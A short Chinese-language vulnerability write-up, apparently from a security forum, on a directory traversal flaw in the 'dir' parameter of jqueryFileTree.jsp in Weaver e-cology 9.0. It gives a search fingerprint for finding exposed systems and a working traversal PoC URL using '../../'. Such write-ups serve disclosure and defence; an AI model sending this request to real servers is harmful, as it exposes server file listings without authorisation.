WeaverOA E-Cology jqueryFileTree.jsp 目录遍历漏洞

# WeaverOA E-Cology jqueryFileTree.jsp 目录遍历漏洞 ## 漏洞描述 Weavere-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等,其中 jqueryFileTree.jsp 文...

WeaverOA E-Cology jqueryFileTree.jsp 目录遍历漏洞

漏洞描述

Weavere-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等,其中 jqueryFileTree.jsp 文件中 dir 参数存在目录遍历漏洞,攻击者通过漏洞可以获取服务器文件目录信息

漏洞影响

Weavere-cology 9.0

网络测绘

app="泛微-协同办公OA"

漏洞复现

登录页面

img

验证POC

/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../

img

  • 发表于 2024-07-12 18:44:46
  • 阅读 ( 1490 )
  • 分类:OA产品

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计